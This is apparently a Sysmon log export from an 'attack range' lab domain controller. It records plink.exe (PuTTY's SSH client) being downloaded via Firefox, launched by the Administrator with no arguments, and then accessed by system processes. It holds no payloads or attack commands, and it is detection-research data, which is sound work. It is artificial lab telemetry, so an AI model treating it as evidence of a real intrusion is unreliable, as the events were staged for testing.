Record 7090874, UtcTime 16:35:41.504, SourceThreadId 4516, GrantedAccess 0x1000, CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+caa9e|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Record 7090873, UtcTime 16:35:41.504, SourceThreadId 4516, GrantedAccess 0x1000, CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9964|C:\Windows\System32\SHELL32.dll+caa67|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Record 7090867, UtcTime 16:35:41.489, SourceThreadId 2700, GrantedAccess 0x1410, CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9fdf|C:\Windows\System32\SHELL32.dll+cab85|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Record 7090865, UtcTime 16:35:41.489, SourceThreadId 2700, GrantedAccess 0x1000, CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+caa9e|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Record 7090863, Event 10 (Process accessed), schema v3, UtcTime 2022-09-15 [remainder of the record is absent from the export]
16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9964|C:\Windows\System32\SHELL32.dll+caa67|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090862Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.489{D271FDA4-6971-631F-537A-000000007402}67162700C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\explorer.exe+1f054|C:\Windows\explorer.exe+1f000|C:\Windows\explorer.exe+1dfec|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007090818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:35:41.473{D271FDA4-545D-6323-DEFE-000000007402}54247260C:\Windows\system32\conhost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x80000000000000007090806Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY suiteSimon TathamPlinkMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAAtrueSimon TathamValid 154100x80000000000000007090769Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.467{D271FDA4-545D-6323-DEFE-000000007402}5424C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe"C:\Users\Administrator\Downloads\plink.exe" 13241300x80000000000000007090767Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 
16:35:41.458{D271FDA4-6971-631F-537A-000000007402}6716C:\Windows\explorer.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{198A980B-07CB-45FB-8CA4-B74B900D72DB}\AppIdC:\Users\Administrator\Downloads\plink.exe 734700x80000000000000007090760Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\KernelBase.dll10.0.14393.5246 (rs1_release.220701-1744)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=96EFBE3DB6300BB13E0720809302FF9F,SHA256=2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2FtrueMicrosoft WindowsValid 734700x80000000000000007090759Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValid 734700x80000000000000007090757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValid 10341000x80000000000000007090755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 
16:35:41.458{D271FDA4-675B-631B-1400-000000007402}10362404C:\Windows\System32\svchost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000007090754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-SetValue2022-09-15 16:35:41.458{D271FDA4-675B-631B-1400-000000007402}1036C:\Windows\System32\svchost.exeHKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\plink.exeBinary Data 10341000x80000000000000007090752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-675B-631B-1400-000000007402}10366776C:\Windows\System32\svchost.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7ac63|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+5342c|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007090750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-6B85-631B-7001-000000007402}41002992C:\Windows\system32\csrss.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007090749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.458{D271FDA4-6971-631F-537A-000000007402}67165892C:\Windows\explorer.exe{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e73b|C:\Windows\System32\windows.storage.dll+16e451|C:\Windows\System32\windows.storage.dll+16e09e|C:\Windows\System32\windows.storage.dll+16f340|C:\Windows\System32\windows.storage.dll+16ddee|C:\Windows\System32\windows.storage.dll+fce8d|C:\Windows\System32\windows.storage.dll+fd5cc|C:\Windows\System32\windows.storage.dll+fc930|C:\Windows\System32\windows.storage.dll+16650a|C:\Windows\System32\windows.storage.dll+166262|C:\Windows\System32\SHELL32.dll+9cafd|C:\Windows\System32\SHELL32.dll+9b696|C:\Windows\System32\SHELL32.dll+8dfa9|C:\Windows\System32\SHELL32.dll+cf48e|C:\Windows\System32\SHELL32.dll+157b8c|C:\Windows\System32\SHELL32.dll+1578e3|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007090748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:41.449{D271FDA4-545D-6323-DDFE-000000007402}5468C:\Users\Administrator\Downloads\plink.exeRelease 0.77Command-line SSH, Telnet, and Rlogin clientPuTTY 
suiteSimon TathamPlink"C:\Users\Administrator\Downloads\plink.exe" C:\Users\Administrator\Downloads\ATTACKRANGE\Administrator{D271FDA4-6B87-631B-16FE-1C0000000000}0x1cfe162HighMD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA{D271FDA4-6971-631F-537A-000000007402}6716C:\Windows\explorer.exeC:\Windows\explorer.exe /NOUACCHECK 15241500x80000000000000007089154Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.446{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe:Zone.Identifier2022-09-15 16:35:23.409MD5=B24F23CBE6F0C95BAE4DBAF344FB276E,SHA256=BF83A611C6EFA6792BC4D96978F28A8267A0277C46A82F50435DDCEDDBEA0F2C[ZoneTransfer] ZoneId=3 ReferrerUrl=https://www.chiark.greenend.org.uk/ HostUrl=https://the.earth.li/~sgtatham/putty/0.77/w64/plink.exe 11241100x80000000000000007089153Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.445{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe:Zone.Identifier2022-09-15 16:35:23.409 15241500x80000000000000007089152Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:24.438{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe2022-09-15 16:35:23.409MD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA- 11241100x80000000000000007088933Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:35:23.426{D271FDA4-5436-6323-C9FE-000000007402}4560C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\Downloads\plink.exe2022-09-15 16:35:23.426